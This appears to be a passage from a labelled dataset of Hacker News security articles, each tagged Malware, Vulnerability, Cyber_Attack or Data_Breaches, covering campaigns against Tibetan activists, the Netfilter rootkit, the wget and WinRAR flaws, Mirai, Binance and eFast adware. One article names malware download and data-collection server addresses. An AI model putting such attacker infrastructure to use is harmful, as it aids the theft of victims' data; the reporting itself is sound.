In the last few of months, several security vendors have reported targeted attacks that distributed malware designed to steal confidential information from people or organizations supporting the Tibetan cause. This tactic recently re-surfaced during our monitoring of Tibetan-leveraging malware campaigns. It came in the form of BKDR_RILER.SVR, a backdoor that arrives infected by PE_SALITY.AC.
A simple Spear Phishing technique was used recently to trick Tibetan activists into opening malicious PDF email attachments, by quoting a legitimate email message sent by FireEye's Lanstein to people who submitted Tibet-related malware samples to the VirusTotal online antivirus scanning service.
According to Trend Micro researcher Ivan Macalintal, by exploiting a vulnerability, the attachment - Next Generation Threats.pdf - drops a malicious JavaScript that in its turn drops a RAT that connects to a IP address located in China. There are a few hints that the people behind the attack are Chinese. The email text was recreated under a key official character set of the People's Republic of China, and in the footer of the decoy PDF file a few Chinese characters can be found.
The said backdoor communicates the following information to the IP address about IM IDs and password, List of drives and files, User account names and passwords.
The social engineering techniques used in these attacks are increasingly sophisticated and the distributed malware is capable of infecting both Windows and Mac OS X computers. On Friday, researchers from antivirus firm Kaspersky Lab reported the discovery of a new Mac OS X backdoor which they named SabPub.
Tibetan activists are on a long hit list uncovered by Trend Micro and dubbed the Luckycat campaign it uses spear-phishing to inject Windows malware, and targets military and other sensitive entities in India and Japan as well as Tibetan activists.
",Malware
Hackers Trick Microsoft Into Signing Netfilter Driver Loaded With Rootkit Malware,https://thehackernews.com/2021/06/hackers-trick-microsoft-into-signing.html,"Microsoft on Friday said it's investigating an incident wherein a driver signed by the company turned out to be a malicious Windows rootkit that was observed communicating with command-and-control (C2) servers located in China.
The driver, called ""Netfilter,"" is said to target gaming environments, specifically in the East Asian country, with the Redmond-based firm noting that ""the actor's goal is to use the driver to spoof their geo-location to cheat the system and play from anywhere.""
""The malware enables them to gain an advantage in games and possibly exploit other players by compromising their accounts through common tools like keyloggers,"" Microsoft Security Response Center (MSRC) said.
It's worth pointing out that Netfilter also refers to a legitimate software package, which enables packet filtering and network address translation for Linux based systems.
Microsoft dubbed the malware ""Retliften,"" alluding to ""netfilter"" but spelled backwards, adding the malicious driver can intercept network traffic, add new root certificates, set a new proxy server, and modify internet settings without a user's consent.
The rogue code signing was spotted by Karsten Hahn, a malware analyst at German cybersecurity company G Data, who shared additional details of the rootkit, including a dropper, which is used to deploy and install Netfilter on the system.
Upon successful installation, the driver was found to establish connection with a C2 server to retrieve configuration information, which offered a number of functionalities such as IP redirection, among other capabilities to receive a root certificate and even self-update the malware.
The oldest sample of Netfilter detected on VirusTotal dates back to March 17, 2021, Hahn said.
Microsoft noted that the actor submitted the driver for certification through the Windows Hardware Compatibility Program (WHCP), and that the drivers were built by a third-party. The company has since suspended the account and reviewed its submissions for additional signs of malware.
The Windows maker also stressed that the techniques employed in the attack occur post-exploitation, which necessitates that the adversary must have had previously gained administrative privileges so as to be able to install the driver during system startup or trick the user into doing it on their behalf.
Additionally, Microsoft said it intends to refine its partner access policies as well as its validation and signing process to enhance protections further.
""The security landscape continues to rapidly evolve as threat actors find new and innovative methods to gain access to environments across a wide range of vectors,"" MSRC said, once again highlighting how the trust associated with signed drivers can be exploited by threat actors to facilitate large-scale software supply chain attacks.
",Malware
CVE-2014-4877: Wget FTP Symlink Attack Vulnerability,https://thehackernews.com/2014/10/cve-2014-4877-wget-ftp-symlink-attack.html,"The open-source Wget application which is most widely used on Linux and Unix systems for retrieving files from the web has found vulnerable to a critical flaw.
GNU Wget is a command-line utility designed to retrieve files from the Web using HTTP, HTTPS, and FTP, the most widely used Internet protocols. Wget can be easily installed on any Unix-like system and has been ported to many environments, including Microsoft Windows, Mac OS X, OpenVMS, MorphOS and AmigaOS.
When a recursive directory fetch over FTP server as the target, it would let an attacker ""create arbitrary files, directories or symbolic links"" due to a symlink flaw.
IMPACT OF SYMLINK ATTACK
""It was found that wget was susceptible to a symlink attack which could create arbitrary files, directories or symbolic links and set their permissions when retrieving a directory recursively through FTP,"" developer Vasyl Kaigorodov wrote in a Red Hat Bugzilla comment.
A remote unauthenticated malicious FTP server connected to the victim via wget would allow attackers to do anything they wanted. Wget could download and create or overwrite existing files within the context of the user running wget.
The vulnerability was first reported to the GNU Wget project by HD Moore, chief research officer at Rapid7. and is publicly identified as CVE-2014-4877. The flaw is considered critical since wget is present on nearly every Linux server in the world, and is installable (although not by default) on OS X machines as well, so needs a patch as soon as possible.
PATCH AVAILABLE
""This flaw can lead to remote code execution through system-level vectors such as cron and user-level vectors such as bash profile files and SSH authorized_keys,"" Moore wrote.
The vulnerability has now been fixed by the Wget project in wget 1.16, which blocks the default setting that allowed the setting of local symlinks.
""Upgrade to wget version 1.16 or a package that has backported the CVE-2014-4877 patch,"" Moore said.
WORKAROUND AVAILABLE EXPLOIT
""This issue can be mitigated by ensuring that all invocations of wget in the mirror mode also specify --retr-symlinks command line option,"" wrote Tomas Hoger on the Bugzilla report. ""Doing so is equivalent to applying the upstream commit linked in comment 14, which changes the default for the retr-symlinks options from off/no to on/yes, preventing creation of symbolic links locally.""
""In addition to changing arguments in all scripts or programs that invoke wget, it is possible to enabled[sic] retr-symlinks option via wget configuration file - either global /etc/wgetrc, or user specific ~/.wgetrc - by adding the line: retr-symlinks=on""
An exploit for the vulnerability is now available on the open-source Metasploit penetration testing Website, so that security researchers could test the bug. You can download the exploit from here.
",Vulnerability
First Ever Windows Malware that can hack your Android Mobile,https://thehackernews.com/2014/01/first-ever-windows-malware-that-can_23.html,"Hey Android users! I am quite sure that you must be syncing your Smartphone with your PCs for transferring files and generating backup of your device.
If your system is running a windows operating system, then it's a bad news for you. Researchers have discovered a new piece of windows malware that attempts to install mobile banking malware on Android devices while syncing.
Last year in the month of February, Kaspersky Lab revealed an Android malware that could infect your computer when connected to Smartphone or tablets.
Recently, Researchers at Symantec antivirus firm discovered another interesting windows malware called 'Trojan.Droidpak', that drops a malicious DLL in the computer system and then downloads a configuration file from the following remote server:
https://xia2.dy[REMOVED]s-web.com/iconfig.txt
The Windows Trojan then parses this configuration file and download a malicious APK (an Android application) from the following location on the infected computer.
%Windir%\CrainingApkConfig\AV-cdk.apk
To communicate with the mobile device a command line tool Android Debug Bridge (ADB) is required, that allows the malware to execute commands on Android devices connected to the infected computer. ADB is a legitimate tool and part of the official Android software development kit (SDK).
In the next step, the trojan downloads all the necessary tools including Android Debug Bridge and the moment you connect an android device having USB debugging Mode enabled, it initiates the installation process and repeats it until it ensure that the connected device has been infected and install an app that will appear as a fake Google App Store.
Such Windows Malware is first of its own kind, since attackers prefer to use the social engineering techniques to spread their fake malicious apps hosted on third-party app stores. The installed malware dubbed as ""Android.Fakebank.B"", able to intercept victim's SMS messages and then send them to the attacker's server located at:
https://www.slmoney.co.kr[REMOVED]
Anyway Relax, if you are not a Korean citizen, because the malicious APK actually looks for certain Korean online banking applications on the compromised device.
If you want to protect your Mobile and system from such Malware attack, Please consider a few points while connecting to a windows based computer:
Turn off USB debugging on your Android device, when you are not using it
Avoid connecting your droid with public computers
Only Install reputable security software
Keep your System, Softwares and Antivirus up-to-date.
Stay Safe!
",Malware
Rule 41 — FBI Gets Expanded Power to Hack any Computer in the World,https://thehackernews.com/2016/11/fbi-rule-41-hacking.html,"Hacking multiple computers across the world just got easier for the United States intelligence and law enforcement agencies from today onwards.
The changes introduced to the Rule 41 of the Federal Rules of Criminal Procedure by the United States Department of Justice came into effect on Thursday, after an effort to block the changes failed on Wednesday.
The change grants the FBI much greater powers to hack into multiple computers within the country, and perhaps anywhere in the world, with just a single warrant authorized by any US judge (even magistrate judges). Usually, magistrate judges only issue warrants for cases within their jurisdiction.
That's the same the FBI did in its 2015 investigation into child pornography site Playpen, in which the agency hacked into some 8,700 computers across 120 different countries.
The Supreme Court approved the changes to Rule 41 in April, allowing any U.S. judge to issue search warrants that give the FBI and law enforcement agencies authority to remotely hack computers in any jurisdiction, or even outside the United States.
Democratic Senator Ron Wyden attempted three times to block changes to Rule 41 that potentially risks people using Tor, a VPN, or some other anonymizing software to hide their whereabouts, but the efforts were blocked by Republican Senator John Cornyn of Texas.
The rule change should take effect on 1st December, today, barring surprises.
On the one hand, privacy advocates and legal experts have described the rule change as the extensive expansion of extraterritorial surveillance power that will allow agencies like the FBI to carry out international hacking operations with a lot less of a hassle.
On the other hand, the DOJ argued that the changes to the rule will help investigate modern internet criminals, allowing investigators access computers whose locations are ""concealed through technological means,"" like the Tor anonymity network or VPNs (Virtual Private Networks), and devices used in botnets that have become powerful cyber weapons.
Assistant Attorney General Leslie Caldwell highlighted these concerns in a blog post published last week, saying if a criminal suspect is using Tor or VPN to hide its real location, it becomes tough for investigators to know his/her current location.
""So in those cases, the Rules do not clearly identify which court the investigators should bring their warrant application to,"" Caldwell said.
But what would happen if the FBI hacks the botnet victims, rather than the perpetrators? Or what if the government abuses this power to target nation states?
In a speech, Wyden said that the changes to Rule 41 amounted to ""one of the biggest mistakes in surveillance policy in years,"" giving federal investigators ""unprecedented authority to hack into Americans' personal phones, computers, and other devices,"" Reuters reports.
Other critics worry that the changes to Rule 41 would give the FBI unfettered ability to hack innocent users whose electronic devices have been infected with botnet malware without their knowledge, or anyone who keeps their identities private online.
To this concern, Caldwell argued that investigators accessing the devices of botnet victims ""would, typically, be done only to investigate the extent of the botnet,"" or in order to ""obtain information necessary to liberate victims' computers from the botnet.""
Caldwell further argued that the rule change would not allow the FBI to conduct ""Mass Hacking;"" in fact, failing to implement the rule change ""would make it more difficult for law enforcement to combat mass hacking by actual criminals.""
",Malware
Secure Messaging App 'Confide' Used by White House Staffers Found Vulnerable,https://thehackernews.com/2017/03/confide-secure-messenger.html,"The secure messaging app used by staffers in the White House and on Capitol Hill is not as secure as the company claims.
Confide, the secure messaging app reportedly employed by President Donald Trump's aides to speak to each other in secret, promises ""military-grade end-to-end encryption"" to its users and claims that nobody can intercept and read chats that disappear after they are read.
However, two separate research have raised a red flag about the claims made by the company.
Security researchers at Seattle-based IOActive discovered multiple critical vulnerabilities in Confide after a recent audit of the version 1.4.2 of the app for Windows, Mac OS X, and Android.
Confide Flaws Allow Altering of Secret Messages
The critical flaws allowed attackers to:
Impersonate friendly contacts by hijacking an account session or guessing a password, as the app failed to prevent brute-force attacks on account passwords.
Spy on contact details of Confide users, including real names, email addresses, and phone numbers.
Intercept a conversation and decrypt messages. Since the app's notification system didn't require any valid SSL server certificate to communicate, a man-in-the-middle attacker can potentially grab messages intended for a legitimate recipient.
Alter the contents of a message or attachment in transit without first decrypting it.
Send malformed messages that can crash, slow, or otherwise disrupt the application.
Exploiting the weaknesses allowed the researchers to gain access to more than 7,000 account records created over the span of two days (between February 22 and 24), out of a database containing between 800,000 and 1 Million records.
Flaw Exposed Details of a Trump Associate and Several DHS Employees
Out of just that 2-day sample, the researchers were even able to find a Donald Trump associate and several employees from the Department of Homeland Security (DHS) who downloaded the Confide app.
IOActive researchers Mike Davis, Ryan O'Horo, and Nick Achatz responsibly disclosed a total 11 separate issues in Confide to the app's developers, who responded immediately by patching the app.
In addition to this, researchers from Quarkslab also showed off Confide exploits Wednesday after analyzing the app's code.
The researchers discovered a series of design vulnerabilities in the Confide for iOS app, which could allow the company to read user messages, adding that the app didn't notify users when encryption keys were changed.
Even, The Company Can Read Your Messages
According to the researchers, ""Confide server can read your messages by performing a man-in-the-middle attack,"" and other security features of the app, such as message deletion and screenshot prevention, can also be defeated.
""The end-to-end encryption used in Confide is far from reaching state of the art,"" the researchers said. ""Building a secure instant messaging app is not easy, but when claiming it, some strong mechanisms should really be enforced since the beginning.""
Quarkslab researchers said the company server could generate its own key pair, meaning that the company has the ability to transmit the public key to a client when requesting the public key of a recipient.
""This client then unknowingly encrypts a message that can be decrypted by the server,"" the researchers added. ""Finally, when the server sends the message to the recipient, it is able to re-encrypt the message with its own key for the actual recipient.""
In response to Quarkslab's findings, Confide co-founder and president Jon Brod said:
""The researchers intentionally undermined the security of their own system to bypass several layers of Confide's protection, including application signatures, code obfuscation, and certificate pinning. The attack that they claim to be demonstrating does not apply to legitimate users of Confide, who are benefiting from multiple security protections that we have put in place. Undermining your own security or taking complete control of a device makes the entire device vulnerable, not just the Confide app.""
Confide has rolled out an updated version of its app which includes fixes for the critical issues, and assured its customers that there wasn't any incident of these flaws being exploited by any other party.
Confide is one of those apps which, unlike other secure messaging apps, keeps its code private and until this time, offered little or no detail about the encryption protocols used in the app.
For more details about the vulnerabilities in Confide, you can head on to IOActive's advisory and Quarkslab's Blog.
",Vulnerability
Vulnerability found in Apple's iOS can hide malicious code inside apps,https://thehackernews.com/2013/08/vulnerability-found-in-apples-ios-can.html,"A Georgia Tech researcher has found a weakness in Apple's iOS mobile platform that could let hackers to hide malicious code inside apps and can be surreptitiously planted on the Apple App Store.
Researchers team created a proof-of-concept attack that was published in the Apple App Store and used to remotely launch attacks on a controlled batch of devices, enabling them to post unauthorized tweets, take photos and even go after other apps.
""Our research shows that despite running inside the iOS sandbox, a Jekyll-based app can successfully perform many malicious tasks, such as posting tweets, taking photos, sending email and SMS, and even attacking other apps all without the user's knowledge.""
Using a BeagleBoard, team created a USB malicious charger called Mactans that can install apps without user knowledge within a minute of being plugged in.
In one demonstration, the attacker was able to hide the iPhone Facebook application and install a malicious copy in its place. The malware executed its task, then launched the legitimate hidden copy of Facebook, leaving the user none the wiser.
Soon after the researchers reported the bug to Apple and they are fixing that flaw in iOS 7, that notifies users when they plug their mobile device into any peripheral that attempts to establish a data connection, and is working on ways to address the weaknesses revealed through Jekyll.
",Malware
Patched WinRAR Bug Still Under Active Attack—Thanks to No Auto-Updates,https://thehackernews.com/2019/03/winrar-hacking-malware.html,"Various cyber criminal groups and individual hackers are still exploiting a recently patched critical code execution vulnerability in WinRAR, a popular Windows file compression application with 500 million users worldwide.
Why? Because the WinRAR software doesn't have an auto-update feature, which, unfortunately, leaves millions of its users vulnerable to cyber attacks.
The critical vulnerability (CVE-2018-20250) that was patched late last month by the WinRAR team with the release of WinRAR version 5.70 beta 1 impacts all prior versions of WinRAR released over the past 19 years.
For those unaware, the vulnerability is ""Absolute Path Traversal"" bug that resides in the old third-party library UNACEV2.DLL of WinRAR and allows attackers to extract a compressed executable file from the ACE archive to one of the Windows Startup folders, where the malicious file would automatically run on the next reboot.
Therefore, to successfully exploit this vulnerability and take full control over the targeted computers, all an attacker needs to do is just convincing users into opening a maliciously-crafted compressed archive file using WinRAR.
Immediately after the details and proof-of-concept (PoC) exploit code went public, malicious attackers started exploiting the vulnerability in a malspam email campaign to install malware on users' computers running the vulnerable version of the software.
Now, security researchers from McAfee reported that they identified more than ""100 unique exploits and counting"" in the first week since the vulnerability was publicly disclosed, with most of the initial targets residing in the United States.
One recent campaign spotted by the researchers piggybacks on a bootlegged copy of an Ariana Grande's hit album, which is currently being detected as malware by only 11 security products, whereas 53 antivirus products fail to alert their users at the time of writing.
The malicious RAR file (Ariana_Grande-thank_u,_next(2019)_[320].rar) detected by McAfee extracts a list of harmless MP3 files to the victim's download folder but also drops a malicious EXE file to the startup folder, which has been designed to infect the targeted computer with malware.
""When a vulnerable version of WinRAR is used to extract the contents of this archive, a malicious payload is created in the Startup folder behind the scenes,"" the researchers explain.
""User Access Control (UAC) is bypassed, so no alert is displayed to the user. The next time the system restarts, the malware is run.""
Unfortunately, such campaigns are still ongoing, and the best way to protect yourself from such attacks is to update your system by installing the latest version of the WinRAR software as soon as possible and avoid opening files received from unknown sources.
",Vulnerability
"uTorrent & BitTorrent Sites Hacked, Spread Security Shield Malware",https://thehackernews.com/2011/09/utorrent-bittorrent-sites-hacked-spread.html,"uTorrent & BitTorrent Sites Hacked, Spread Security Shield Malware
Attackers hijacked two popular Torrent websites ""bittorrent.com and utorrent.com"" and tampered with their download mechanisms, causing visitors trying to obtain file-sharing software to instead receive malware. The site reported on its blog that the attack had occurred at around 04:20 Pacific Daylight Time (11:20 GMT) on Tuesday. Initially, the incursion was also thought to have affected the servers of the main BitTorrent site, but further investigation revealed this site had been unaffected by the attack.
Once installed, Security Shield delivers false reports that a computer is infected with multiple pieces of malware and prompts the user for payment before claiming to disinfect the machine. The attack affected only users who downloaded and installed software from bittorrent.com and utorrent.com during the hour-and-fifty-minute window that the sites were compromised. Those who installed software previously are unaffected.
""We have completed preliminary testing of the malware. Upon installation, a program called 'Security Shield"" launches and pops up warnings that a virus has been detected. It then prompts a user for payment to remove the virus. "" experts write on the blog.
It is very important to once more note that infected are only users who have downloaded the software between 4:20 a.m. and 6:10 a.m. Pacific time. If you have previously downloaded it - you can rest assured your software is clean.
",Malware
Cyber attack hits Istanbul Airport passport control system,https://thehackernews.com/2013/07/Istanbul-airport-cyber-attack-virus.html,"The passport control system at Istanbul Ataturk Airport International departure terminal was under cyber attack on Friday, while another airport in the Turkish largest city was also affected.
Passengers stood in lines for hours and plane departures were delayed, because cyberattack shutdown passport control systems at two facilities. Later Authorities has restored the systems.
Few local media said that the passport control system at the Sabiha Gokcen International Airport in Istanbul also broke down due to the malfunction of the Istanbul provincial security directorate's Polnet data system.
They believe that systems were infected using some malwares, But Authorities also investigating if the malware yielded user details from the infected machines or not.
No claim of responsibility or blame was attributed to the alleged cyberattack. However, this is another malware attacks been reported, targeting vital infrastructure so far. Cybersecurity has emerged as an emerging threat to national security in the digital age.
",Cyber_Attack
Human Rights organisation website Serves Gh0st RAT Trojan,https://thehackernews.com/2012/05/human-rights-organisation-website.html,"Human Rights organisation website Serves Gh0st RAT Trojan
According to the company's Security Labs blog, Amnesty International's United Kingdom website was compromised and hosting the potent Gh0st RAT Trojan earlier this week. Malicious Java code was planted on the site in a bid to push the Gh0st RAT Trojan onto vulnerable Windows machines. If successful, the attack plants malware onto machines that is capable of extracting the user's files, email, passwords and other sensitive personal information.
The vulnerability for the infection stemmed from a popular Java exploit, CVE-2012-050. Hackers exploited that hole and used it to inject the Amnesty International site's script with malicious code. The Java hole was the same used by Flashback, the much buzzed-about Mac OS X Trojan in recent months.
The exploit code used in this attack appears to have been copied from Metasploit, an open source penetration testing framework popular among security professionals, Giuliani said.
The injected web code was removed after Websense alerted Amnesty to the issue.The attack bears all the hallmarks of a series of attacks that appear to be targeting pro-Tibet organisations and sympathisers, most likely by a group connected to China.
The Gh0st Trojan has been used by suspected Chinese hackers in several advanced persistent threat (APT) style attacks, most notably the 'Nitro' attacks against energy firms in 2011. Chinese involvement in the Amnesty International attack is suspected but unproven.
Websense detected over 100 other websites infected with the same malicious code as Amnesty International's U.K. website during the same time period, Carl Leonard, senior manager of Websense Security Labs, said.
",Malware
(Unpatched) Adobe Flash Player Zero-Day Exploit Spotted in the Wild,https://thehackernews.com/2018/02/flash-zero-day-exploit.html,"Another reason to uninstall Adobe Flash Player—a new zero-day Flash Player exploit has reportedly been spotted in the wild by North Korean hackers.
South Korea's Computer Emergency Response Team (KR-CERT) issued an alert Wednesday for a new Flash Player zero-day vulnerability that's being actively exploited in the wild by North Korean hackers to target Windows users in South Korea.
Simon Choi of South Korea-based cybersecurity firm Hauri first reported the campaign on Twitter, saying the North Korean hackers have been using the Flash zero-day against South Koreans since mid-November 2017.
Although Choi did not share any malware sample or details about the vulnerability, the researcher said the attacks using the new Flash zero-day is aimed at South Korean individuals who focus on researching North Korea.
Adobe also released an advisory on Wednesday, which said the zero-day is exploiting a critical 'use-after-free' vulnerability (CVE-2018-4878) in its Flash media software that leads to remote code execution.
The critical vulnerability affects Adobe Flash Player version 28.0.0.137 and earlier versions for:
Desktop Runtime (Win/Mac/Linux)
Google Chrome (Win/Mac/Linux/Chrome OS)
Microsoft Edge and Internet Explorer 11 (Win 10 & 8.1)
""Adobe is aware of a report that an exploit for CVE-2018-4878 exists in the wild, and is being used in limited, targeted attacks against Windows users,"" the advisory said. ""These attacks leverage Office documents with embedded malicious Flash content distributed via email. Adobe will address this vulnerability in a release planned for the week of February 5.""
To exploit the vulnerability, all an attacker need to do is trick victims into opening Microsoft Office documents, web pages, or spam messages that contain a maliciously crafted Adobe Flash file.
The vulnerability can be leveraged by hackers to take control of an affected computer.
Choi also posted a screenshot to show that the Flash Player zero-day exploit has been delivered via malicious Microsoft Excel files.
Adobe said in its advisory that the company has planned to address this vulnerability in a ""release planned for the week of February 5,"" through KR-CERT advises users to disable or completely remove the buggy software.
",Vulnerability
"Friday's Massive DDoS Attack Came from Just 100,000 Hacked IoT Devices",https://thehackernews.com/2016/10/ddos-attack-mirai-iot.html,"Guess how many devices participated in last Friday's massive DDoS attack against DNS provider Dyn that caused vast internet outage?
Just 100,000 devices.
I did not miss any zeros.
Dyn disclosed on Wednesday that a botnet of an estimated 100,000 internet-connected devices was hijacked to flood its systems with unwanted requests and close down the Internet for millions of users.
Dyn executive vice president Scott Hilton has issued a statement, saying all compromised devices have been infected with a notorious Mirai malware that has the ability to take over cameras, DVRs, and routers.
""We're still working on analyzing the data but the estimate at the time of this report is up to 100,000 malicious endpoints,"" Hilton said. ""We are able to confirm that a significant volume of attack traffic originated from Mirai-based botnets.""
Mirai malware scans for Internet of Things (IoT) devices that are still using their default passwords and then enslaves those devices into a botnet, which is then used to launch DDoS attacks.
A day after the attack, Dyn confirmed that a botnet of Mirai malware-infected devices had participated in its Friday's Distributed Denial of Service attacks.
However, after an initial analysis of the junk traffic, just yesterday, the company revealed that it had identified an estimated 100,000 sources of malicious DDoS traffic, all originating from IoT devices compromised by the Mirai malware.
Earlier the company believed that approximately ""tens of millions"" of IP addresses were responsible for the massive attack against its crucial systems, but the actual number came out to be much much less, leaving all of us wondering, as:
How did the Attack Succeed to this Massive Level?
To this, Hilton said that Domain Name System protocol itself has the ability to amplify requests from legitimate sources.
""For example, the impact of the attack generated a storm of legitimate retry activity as recursive servers attempted to refresh their caches, creating 10-20X normal traffic volume across a large number of IP addresses,"" Hilton said. ""When DNS traffic congestion occurs, legitimate retries can further contribute to traffic volume.""
""It appears the malicious attacks were sourced from at least one botnet, with the retry storm providing a false indicator of a significantly larger set of endpoints than we now know it to be.""
Friday's cyber attack overwhelmed Dyn's central role in routing and managing Internet traffic, rendering hundreds of sites and services, including Twitter, GitHub, Amazon, Netflix, Pinterest, Etsy, Reddit, PayPal, and AirBnb, inaccessible to Millions of people worldwide for several hours.
Dyn did not disclose the actual size of the attack, but it has been speculated that the DDoS attack could be much bigger than the one that hit French Internet service and hosting provider OVH that peaked at 1.1 Tbps, which is the largest DDoS attack known to date.
According to the company, this attack has opened up an important debate about Internet security and volatility.
""Not only has it highlighted vulnerabilities in the security of 'Internet of Things' (IOT) devices that need to be addressed, but it has also sparked further dialogue in the Internet infrastructure community about the future of the Internet,"" Hilton said.
Next DDoS Attack could reach Tens Of Terabits-Per-Second
If the IoT security is not taken seriously, the future DDoS attack could reach tens of terabits-per-second, as estimated by network security firm Corero.
The DDoS threat landscape is skyrocketing and could reach tens of terabits-per-second in size, following a discovery of a new zero-day attack vector that has the ability to amplify DDoS attacks by as much as 55x, Corero warned in a blog post published Tuesday.
According to the security firm, this new attack vector uses the Lightweight Directory Access Protocol (LDAP), which if combined with an IoT botnet, could break records in DDoS power.
Dave Larson of Corero explains:
""LDAP is not the first, and will not be the last, protocol or service to be exploited in this fashion. Novel amplification attacks like this occur because there are so many open services on the Internet that will respond to spoofed record queries. However, a lot of these attacks could be eased by proper service provider hygiene, by correctly identifying spoofed IP addresses before these requests are admitted to the network.""
You can read more on Corero's official website.
How to Protect your Smart Device from being Hacked
1. Change Default Passwords of your connected devices: If you have got any internet-connected device at home or work, change your credentials if it still uses default ones. Keep in mind; Mirai malware scans for default settings.
2. Disable Universal Plug-and-Play (UPnP): UPnP comes enabled by default in every IoT device, which creates a hole in your router's security, allowing malware to infiltrate any part of your local network.
Check for ""Universal Plug and Play"" features and turn them OFF.
3. Disable Remote Management through Telnet: Go into your router's settings and disable remote management protocol, specifically through Telnet, as this is a protocol used for allowing one computer to control another from a remote location. It has also been used in previous Mirai attacks.
4. Check for Software Updates and Patches: last but not the least, always keep your connected devices and routers up-to-date with the latest vendor firmware.
Check if your IoT device is vulnerable to Mirai malware
There is an online tool called Bullguard's IoT Scanner that can help you check if any IoT device over your network is vulnerable to Mirai malware.
If it detects any, contact the device's manufacturer or lookout for a solution to patch those vulnerable gaps.
The tool makes use of the vulnerability scanning service Shodan for finding unprotected computers and webcams on your home network that are exposed to the public and potentially accessible to hackers.
",Malware
New Ransom malware infecting computers,https://thehackernews.com/2012/09/new-ransom-malware-infecting-computers.html,"The Metropolitan Police have issued an urgent warning about a new ransom malware that is in circulation. Ransomware (also referred to in some cases as cryptoviruses, cryptotrojans or cryptoworms) comprises a class of malware which restricts access to the computer system that it infects, and demands a ransom paid to the creator of the malware in order for the restriction to be removed.
""The ""malware"" infects personal computers after users have accessed certain websites. *(It should be noted that there are several similar designs currently in circulation)""
Ransomware typically propagates like a typical computer worm, entering a system through, for example, a downloaded file or a vulnerability in a network service. The program will then run a payload which will begin to encrypt personal files on the hard drive. More sophisticated ransomware may hybrid-encrypt the victim's plaintext with a random symmetric key and a fixed public key.
The malware author is the only party that knows the needed private decryption key. Some ransomware payloads do not use encryption. In these cases, the payload is simply an application designed to effectively restrict interaction with the system, typically by overriding explorer.exe in the Windows registry as the default shell, or even modify the master boot record, not allowing the operating system to start at all until it is repaired.
We request readers to share this article with your friends on all social networks to alert them that this is a fraud and users are advised not to pay out any monies or hand out any bank details.
Police advice - ""We would advise anyone who has been deceived by such a message and parted with any money to report the offence to their local police by dialling ""101"" or your local police. Virus/Malware infections where no money has been lost can be logged at www.actionfraud.org.uk/report_fraud.""
Modern ransomware attacks were initially popular within Russia, but in recent years there have been an increasing number of ransomware attacks targeted towards other countries, such as Australia, Germany, and the United States among others.
In order to reduce the chances of being infected by this or similar malware we strongly recommend to use Some Best Antiviruses and never forget to update your software & potential vulnerabilities. Subscribe to The Hacker News Daily free Newsletter for Latest updates.
",Malware
Binance Hacked — Hackers Stole Over $40 Million Worth Of Bitcoin,https://thehackernews.com/2019/05/binance-cryptocurrency-hacked.html,"Binance, one of the largest cryptocurrency exchanges in the world, confirmed today that the company lost nearly $41 million in Bitcoin in what appears to be its largest hack to date.
In a statement, Binance's CEO Changpeng Zhao said the company discovered a ""large scale security breach"" earlier on May 7, as a result of which hackers were able to steal roughly 7000 bitcoins, which worth 40.6 million at the time of writing.
News of the hack comes just hours after Zhao tweeted that Binance has ""to perform some unscheduled server maintenance that will impact deposits and withdrawals for a couple of hours.""
According to the company, malicious attackers used a variety of attack techniques, including phishing and computer viruses, to carry out the intrusion and were able to breach a single BTC hot wallet (a cryptocurrency wallet that's connected to the Internet), which contained about 2% of the company's total BTC holdings, and withdraw stolen Bitcoins in a single transaction.
What's more disturbing is that the company admitted the hackers managed to get their hands on user critical information, such as API keys, two-factor authentication codes, and potentially other information, which is required to log in to a Binance account.
Zao also warned that ""hackers may still control certain user accounts and may use those to influence prices.""
Fortunately, the Binance cold storage—the offline wallets where the majority of funds are kept—remain secure. Also, Internet-connected individual user wallets were not directly affected.
""All of our other wallets are secure and unharmed,"" the company said in a statement. ""The hackers had the patience to wait, and execute well-orchestrated actions through multiple seemingly independent accounts at the most opportune time.""
""The transaction is structured in a way that passed our existing security checks. It was unfortunate that we were not able to block this withdrawal before it was executed.""
Binance has suspended all deposits and withdrawals on its platform for roughly one week while it thoroughly reviews the security and investigates the incident.
Binance CEO said the company last year set up an internal insurance mechanism, called Secure Asset Fund for Users (SAFU), which will cover the entire amount of the hack and won't impact users.
""To protect the future interests of all users, Binance will create a Secure Asset Fund for Users (SAFU),"" Zhao said. ""Starting from 2018/07/14, we will allocate 10% of all trading fees received into SAFU to offer protection to our users and their funds in extreme cases. This fund will be stored in a separate cold wallet.""
Binance CEO also said he would participate in a previously scheduled Twitter Ask-Me-Anything.
",Data_Breaches
This Malware Can Delete and Replace Your Entire Chrome Browser with a lookalike,https://thehackernews.com/2015/10/malware-chome.html,"Security researchers have uncovered a new piece of Adware that replaces your entire browser with a dangerous copy of Google Chrome, in a way that you will not notice any difference while browsing.
The new adware software, dubbed ""eFast Browser,"" works by installing and running itself in place of Google Chrome
The adware does all kinds of malicious activities that we have seen quite often over the years:
Generates pop-up, coupon, pop-under and other similar ads on your screen
Placing other advertisements into your web pages
Redirects you to malicious websites containing bogus contents
Tracking your movements on the web to help nefarious marketers send more crap your way to generating revenue
Therefore, having eFast Browser installed on your machine may lead to serious privacy issues or even identity theft.
What's Nefariously Intriguing About this Adware?
The thing that makes this Adware different from others is that instead of taking control over your browser, eFast Browser uses a deceiving method of replacing your entire browser with a malicious copy of Chrome.
In a report published Malwarebytes detailed that the nefarious software attempts to delete Chrome and itself takes its place, allowing it to hijack several file associations including HTML, JPG, PDF, and GIF, as well as URLs associations including HTTP, HTTPS, and MAILTO.
The eFast Browser is based on Google's Chromium open-source software, so the browser maintains the look and feel of Google Chrome at first glance, tricking users into believing that they are using the legitimate Chrome browser.
The malicious software program then replaces any Chrome desktop website shortcuts with its own versions, showing a striking design resemblance with window and icons from Chrome.
""The installer for eFast also deletes all the shortcuts to Google Chrome on your taskbar and desktop,"" wrote Malwarebytes, ""most likely hoping to confuse the user with their very similar icons.""
What's more?
The eFast Browser is based on Google's Chromium open-source software, so the browser maintains the look and feel of Google Chrome at first glance, tricking users into believing that they are using the legitimate Chrome browser.
The malicious computer program comes from a company calling itself Clara Labs, who developed a slew of similar browsers under titles such as BoBrowser, Unico, and Tortuga.
How does eFast Browser Install itself in the First Place?
eFast Browser is just another Potentially Unwanted Program (PUP), according to PCrisk, which tries to get itself on your PC by burrowing itself into the free software installers from dubious sources on the web.
It's easier for malicious software to replace your browser than to infect it. This is due to Chrome's security against in-browser malware that cyber criminals are now overwriting the browser completely.
It is relatively easy to avoid installing eFast Browser and, fortunately, also relatively easy to uninstall if you have found it on your computer. You can follow the removal instructions detailed by PCRisk.
",Malware
